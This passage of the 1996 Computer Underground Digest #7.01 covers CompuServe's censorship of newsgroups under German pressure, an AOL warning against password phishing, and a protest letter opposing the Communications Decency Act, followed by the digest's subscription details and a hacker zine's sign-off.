of our subscribers, and they don't have any of our groups. We've asked them why they listed them, and not yet heard back, but I think this is actually a very good example of how capricious and dangerous such laws are. They send people into panics, banning anything that looks dangerous, even things they don't even have! If anybody needs a lesson on why laws like the German laws (and the upcoming U.S. decency act) have a chilling effect far beyond even their broad intent, this is it. Had Compuserve carried our electronic newspaper newsgroups, banning these ones would have been silly. Here are the "lurid" headlines from the last few days of clari.news.sex, a newsgroup that contains only professional reporting on sex-related issues... .Vatican: Sex education not okay .Suspended Teacher To Return .Australian Govt Porn Committee Calls For Action .Beijing seizes one million porn, illegal books .Time for the annual best and worst lists .China customs crack down on pornography imports .CompuServe suspends online sex topics .CompuServe bans sex groups, sparking free-speech row The most recent headlines from clari.news.gays as you can see are equally non-lurid .Failed Robbery Led To Gay Slay .Killer To Sell Story .Gays In Military Judge Quits .Lesbian Wins Job Bias Suit I wonder if the Germans thought this was worth banning or CIS made up the list on their own. Either way, the the idea that anybody might, in fear of such laws or under the orders of such laws, ban legitimate professional (and entirely non-lurid) coverage of issues like these is really scary, and we hope our many legitimate subsribers in Germany don't fall prey to this. While the fact that CIS didn't actually have our material makes this less interesting, a big part of the story is that somebody was driven to remove stuff without even knowing what they were removing. ------------------------------ Date: Mon, 1 Jan 1996 15:25:18 -0500 (EST) From: "Declan B. McCullagh" Subject: File 6--WP: Germany Pulls the Shade On CompuServe, Internet Attached are excerpts from today's article in the Washington Post. Compuserve is weaseling, implying German law forced them to censor not just alt.binaries.pictures.erotica.*, but text-only political discussion groups. And the Christian Coalition is supporting them, of course. "CompuServe must comply with the laws of the many countries in which we operate," said CompuServe spokesman William Giles. "However, laws in different countries are often in conflict, and this creates new challenges unique to the emerging on-line industry." "What CompuServe decided to do is a healthy thing," said Heidi Stirrup, [The Christian Coalition's] director of government relations. "I don't see that the Internet is going to be a lesser place" because access to hard-core sexually explicit material has been reduced. -Declan ------------------------------------------------------------------------ The Washington Post January 1, 1996 Cyberporn Debate Goes International Germany Pulls the Shade On CompuServe, Internet By Kara Swisher Washington Post Staff Writer It's often been said that the Internet is a frontier where no one's laws apply. But last week, on one portion of the global computer network, German law took hold. CompuServe Inc., one of the largest on-line service providers in the United States, announced that it would temporarily ban access by all its customers worldwide to some sexually oriented material on the Internet in response to a request from prosecutors in Germany that the material be banned there. For technological reasons, CompuServe cannot block the access of just its 220,000 customers in Germany. "CompuServe must comply with the laws of the many countries in which we operate," said CompuServe spokesman William Giles. "However, laws in different countries are often in conflict, and this creates new challenges unique to the emerging on-line industry." The Christian Coalition, a church organization that has campaigned against pornography on-line, praised the service's move. "What CompuServe decided to do is a healthy thing," said Heidi Stirrup, the coalition's director of government relations. "I don't see that the Internet is going to be a lesser place" because access to hard-core sexually explicit material has been reduced... How far the restrictions will spread remains unclear. Margaret Ryan, a spokeswoman for America Online Inc., the Vienna on-line service that also operates in Germany, said her Virginia-based service had received no request to block the material to its German customers. She would not comment on what the service would do if asked to comply with such a demand. "We are investigating the situation," she said. "But we have no ban." A spokesman for Microsoft Corp.'s Microsoft Network said it had received no request either, but noted that its network had built-in technology that allows parents to control what their children can reach. Both services said that unlike CompuServe, they have the technological means to block just in Germany. That way, U.S. customers' access would not be affected... The German government request is aimed at about 200 of the Internet's 15,000 newsgroups, which are message boards covering topics as diverse as sailing, chess and the jokes of late-night TV show host David Letterman. The ones targeted by Germany in an ongoing investigation are sexually graphic and explicit in nature and include child pornography in a manner that German prosecutors consider illegal under their criminal law. If other countries follow Germany's lead, it could mean that on-line services might have to create a different offering for each country or only offer something to everyone that boils down to the lowest common denominator... Questions of which rules apply have been debated for decades concerning the print and broadcast media. "This is not unexpected, this conflict of laws, because it has gone on for all important emerging mediums," said Tony Rutkowski, executive director of the Internet Society, the Alexandria-based advisory body involved with Internet policy... ------------------------------ Date: Sun, 31 Dec 1995 15:20:24 -0500 From: ZMacGordon@aol.com Subject: File 7--Fwd: ALERT: Password Security Below is the latest news from AOL. Old trick, old news, but people still fall for it, eh? --------------------- Forwarded message: Subj: ALERT: Password Security Date: 95-12-31 07:40:09 EST From: Steve Case To: ZMacGordon Dear Friend of America Online, I want to raise your awareness about an issue that affects us all: the importance of never revealing your password. Recently there have been a few incidents where computer hackers have tried to gain access to passwords by soliciting individuals online. These hackers have increased their level of sophistication so much that they have begun to correspond in a style to make you believe they are representing America Online. Here's an edited excerpt from a recent e-mail attempt: "Dear AOL Community Member: AOL is experiencing major problems...Due to a virus that was recently loaded...onto our main user database, containing most of our member registration information, we are currently experiencing widespread system failure. The problem originated...when our system was illegally breached by a former AOL employee. We believe the employee, who is currently being questioned by authorities, loaded a virus into our database. Because we identified the problem quickly, we were able to stop the problem before the entire database was deleted. The files that were deleted, however, happened to be the database link files...that link a user's password and screen name to the rest of their account. We are currently...working with McAfee Associates (Anti-Virus), to replace the lost files... ...Some of the effects as a result of not having the database link files include: random log-off's, AOLnet runs slower, and Email may accidentally be deleted. These problems are MAJOR inconveniences to our users, so we need your help to fix the problem." The letter continues, outlining the steps you must take to keep your account active, and awarding you free online hours for your troubles. Sending e-mail is just one tactic. Another approach is by using IMs (Instant Messages), where a hacker will notice you are online and try to pass himself off as an employee. Hackers sometimes scan chat areas and the member directory for screen names. Simply put, your passwords are like items in your safety deposit box. They're confidential. YOU are the only person who should know your password. Giving someone (even unintentionally) your password -- especially online -- is like handing over your wallet, keys, and other valuables to complete strangers. There is absolutely no reason why America Online would ever ask you for your password! Be aware: NO EMPLOYEE OR REPRESENTATIVE OF AMERICA ONLINE WILL EVER ASK YOU FOR YOUR PASSWORD, YOUR CREDIT CARD NUMBER, OR TO VERIFY YOUR BILLING INFORMATION ONLINE. IF THEY DO, BE SUSPICIOUS AND TAKE ACTION--REPORT IT IMMEDIATELY. Here are some quick steps to keep your passwords secure: 1) Immediately change your passwords (at keyword PASSWORD) to at least 6 alphanumeric characters -- combination of letters and numbers -- for all of your sub-accounts. Delete unused sub-accounts. 2) NEVER use your screen name, first or last name, town, street, etc. as a password. Do not use a common word. Add a few digits to a word, or misspell it. Hackers use all kinds of programs that search for common words. 3) Inform spouses, children, and others who have access to your account to take the same safety measures, and to NEVER give out passwords. 4) Report suspicious behavior at keyword STAFFPAGER immediately. Computer hacking on America Online is not widespread. But it's an activity -- and an illegal act -- which hinders our ability to conduct business and ensure a safe online community. AOL will pursue all legal action and law enforcement protection within our right to protect the security of our service. We also rely on our members, partners, remote community leaders, and others with overhead accounts much like a neighborhood watch program -- to help crush hacking, to maintain confidentiality of the simplest personal belonging (your password), and to report activity of this kind to AOL immediately. If you have any questions, please discuss them with your contact at AOL. Thank you, and have a Happy New Year. Regards, Steve Case ------------------------------ Date: Wed, 3 Jan 1996 12:46:00 -0800 (PST) From: Declan McCullagh Subject: File 8--Reuters: Telecom Bill Nixed Until Budget Fixed Earlier this afternoon, Reuters reported that Newt Gingrich says no work will be done on the telecom bill until the budget mess is over: In response to a question about whether the telecommunications bill was on the table in talks with Senate leaders, Gingrich said there will be ''nothing on the telecom bill until we have a budget.'' ------------------------------ Date: Mon, 1 Jan 1996 21:40:57 -0600 (CST) From: David Smith Subject: File 9--(fwd) Postcard to Briberspace (fwd) ---------- Forwarded message ---------- ...... Tom Klemesrud ...... Cyberspace .....North Hollywood, CA 91601 ......December 12, 1995 Congressman Howard Berman Briberspace Washington D.C. .. FROM CYBERSPACE TO BRIBERSPACE "Religion: The last refuge of scoundrels and politicians." ..... -Mark Twain I am taking this opportunity to write you from cyberspace in vehement protest on this day--National Electronic Communications Censorship Protest day. Americans have fought and died for our guaranteed Constitutional rights of freedom of speech, and now this Congress has decided those sacrifices where made in vain--"we'll just wipe those away ... we'll do it for the kids." The implication is--by some perverse notion--that the kids will benefit with all americans' free speech rights stripped away. Someone's gone nuts in briberspace. Congressman, if you were an active Internet user, you would know that Exon and his cronies have mis-characterized the perils of cyberspace. I have yet to find on thing obscene on the Net. If cyberspace can't be free, and parents don't feel inclined to use filtering technology or supervise their children, then the Internet is not for those children--they are most likely lost anyway through parental neglect. The Internet, or government, should not and cannot take the place of parents and teachers. The government cannot censor information content. You may know, we already have laws against pornography and child abuse. You know it, I know it, the American People know it. Don't think you're going to get a extra vote from gutting the Constitution. You saw the front page of yesterday's Los Angeles Times I hope. No politician is going to spin this on into the "fighting pornography" or "preventing Society's collapse." The people are brighter that this and you know it--by the 30% approval rating Congress got two days ago. I asked Senator Exon's office for a couple URL addresses for what was in his blue book, and the address did not exist. Perhaps the Senator's staff put that stuff up? Did you ask him where he got the smut he was shocking everybody with? Perhaps he got his information from Martin Rimm--the one who embarrassed Senator Grassley? There are kids killing each other in the streets of California, and you want to send the BBS Sysop to prison for 2 years for running a BBS that can possibly free people from their hopelessness; because they might see an "indecent" word like "tits" on a computer BBS, or by some fluke of filtering technology, glimpse a picture of a naked woman. I would have hoped you efforts might have been a little less silly, and a little more real-world productive--California kids are killing each other in the streets, joining street gangs, engaged in drive-by shootings, selling and using drugs. But perhaps, during the course of these activities, they are not hearing "indecent" words, or aren't exposed to a picture of a naked woman? The priorities in briberspace are upside-down. I am talking about your support for Senator Exon's Communications Decency Act. There is nothing decent about this act--it is a dark-ages political attempt at depriving your constituents of the freedom of speech rights guaranteed them in the First Amendment of the Constitution. It amazes me how public servants in our secular government--with its separation of church and state--can so easily embrace the extremist political agenda of right wing religion zealots, hell bend on lording-over speech and communications in the country, like the Christian Coalition, and the Church of Scientology. I can only hope you did it for the PAC money, for any other motivations for supporting unconstitutional law that I can think of, is far worse. Thus, I coin the space you work in--the halls of Congress--as "briberspace:" That space where seemingly corrupt politicians snidely ignore the people they are supposed to represent, and meet in smoke-filed back rooms with the scoundrel political action committees, taking bribes in return for their powerful vote. Make no mistake: this IS the general scorn for Congress most Americans feel. In a recent poll only 30% of the public gave Congress an approval rating. The People are afraid of politicians like you--uninspired, unthinking politicians--who think they are Kings or Queens meant to lord-over the People of the land, protecting them from the evils of information and thoughts that aren't government approved: Politicians who at every turn, take yet another stab at trying to take away that which the People have left--of any value--their freedoms. President Clinton said, "I can't understand how People can say they love their country and hate their government." It is the scoundrels and politicians held in deep scorn that the People cannot stomach--I puked last Sunday night watching a scene from the Movie "The Distinguished Gentleman" as the Congressman took a PAC bribe. (I just wanted to share that with you.) Yet, the scoundrels and politicians seem to keep coming up with new and innovative ways of stealing our liberty, at every turn, in almost every back-room committee meeting. Is it some new version of fascism we're trying to secretly install? Please think again, before you vote on the Communications Decency Act that attempts to unconstitutionally deprive Americans (only) of their free speech rights, with its "indecent speech" provisions. Government does not have the business trying to regulate content in communications. And, I don't think your going to be willing to build a communications wall around the borders. Have you ever thought of off-shore Internet Service Providers? Have you ever thought you might be destroying a multi-billion dollar service industry that this country has the lead in right now? A recent A. C. Nielson survey found that there are now some 20 million americans now communicating on-line on the Internet. I predict that if this draconian dark-ages legislative agenda you've backed, is forwarded; these millions from cyberspace may materialize into briberspace--like the million man march--to help the scoundrels of the PAC's and politicians beholding to the PAC scoundrels--see the light of the errors of their ways. And, if they can't be shown the light, make them feel the heat. You've offended a great many people with this proposed legislation, and perhaps gotten some political gain with it--like so many times before--from the ignorance of the unfortunate. But, the People will ultimately not allow their communications to be "dumbed-down" to a happy-face 5th grade level. They will fight for their rights to speak and think freely. The ACLU will immediately challenge your CDA. There is also promised civil disobedience, in on instance, by a Texas judge to protest the law. This law is a cruel joke that will backfire on Congress. Please rethink it. Please work to solve our real problems. Don't destroy the one good think this country has. You won't be able to spin-doctor this travesty of legislation to your political advantage. ..... Sincerely yours, ..... Tom Klemesrud PS: You know I run a BBS with over 4,000 voters right in your congressional district. Yet, we haven't heard that you have an E-mail address. I'll be posting this letter to the public bulletin board section. ------------------------------ Date: Sun, 16 Dec 1995 22:51:01 CDT From: CuD Moderators Subject: File 10--Cu Digest Header Info (unchanged since 16 Dec, 1995) Cu-Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost electronically. CuD is available as a Usenet newsgroup: comp.society.cu-digest Or, to subscribe, send post with this in the "Subject:: line: SUBSCRIBE CU-DIGEST Send the message to: cu-digest-request@weber.ucsd.edu DO NOT SEND SUBSCRIPTIONS TO THE MODERATORS. The editors may be contacted by voice (815-753-0303), fax (815-753-6302) or U.S. mail at: Jim Thomas, Department of Sociology, NIU, DeKalb, IL 60115, USA. To UNSUB, send a one-line message: UNSUB CU-DIGEST Send it to CU-DIGEST-REQUEST@WEBER.UCSD.EDU (NOTE: The address you unsub must correspond to your From: line) Issues of CuD can also be found in the Usenet comp.society.cu-digest news group; on CompuServe in DL0 and DL4 of the IBMBBS SIG, DL1 of LAWSIG, and DL1 of TELECOM; on GEnie in the PF*NPC RT libraries and in the VIRUS/SECURITY library; from America Online in the PC Telecom forum under "computing newsletters;" On Delphi in the General Discussion database of the Internet SIG; on RIPCO BBS (312) 528-5020 (and via Ripco on internet); and on Rune Stone BBS (IIRGWHQ) (203) 832-8441. CuD is also available via Fidonet File Request from 1:11/70; unlisted nodes and points welcome. EUROPE: In BELGIUM: Virtual Access BBS: +32-69-844-019 (ringdown) . Brussels: STRATOMIC BBS +32-2-5383119 2:291/759@fidonet.org . In ITALY: ZERO! BBS: +39-11-6507540 . In LUXEMBOURG: ComNet BBS: +352-466893 UNITED STATES: etext.archive.umich.edu (192.131.22.8) in /pub/CuD/ .. ftp.eff.org (192.88.144.4) in /pub/Publications/CuD/ .. aql.gatech.edu (128.61.10.53) in /pub/eff/cud/ .. world.std.com in /src/wuarchive/doc/EFF/Publications/CuD/ .. wuarchive.wustl.edu in /doc/EFF/Publications/CuD/ EUROPE: nic.funet.fi in pub/doc/cud/ (Finland) .. ftp.warwick.ac.uk in pub/cud/ (United Kingdom) The most recent issues of CuD can be obtained from the Cu Digest WWW site at: URL: http://www.soci.niu.edu/~cudigest/ COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing information among computerists and to the presentation and debate of diverse views. CuD material may be reprinted for non-profit as long as the source is cited. Authors hold a presumptive copyright, and they should be contacted for reprint permission. It is assumed that non-personal mail to the moderators may be reprinted unless otherwise specified. Readers are encouraged to submit reasoned articles relating to computer culture and communication. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent . the views of the moderators. Digest contributors assume all . responsibility for ensuring that articles submitted do not . violate copyright protections. ------------------------------ End of Computer Underground Digest #7.01 ************************************ * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #12 of 12 .... The End .Right now I am going to put issues 3, 4 and 5 into HTML, and they will join 1 and 2 at http://hertz.njit.edu/~mrs3691. When I go back to school, I plan on putting graphics on the page, and moving it to a better provider. Issues 6 and beyond will hopefully go out on time, but a little reader input would help. So if you have any thoughts on the zine, or hacking in general, send them in. And wherever you hack, may the ethic be with you!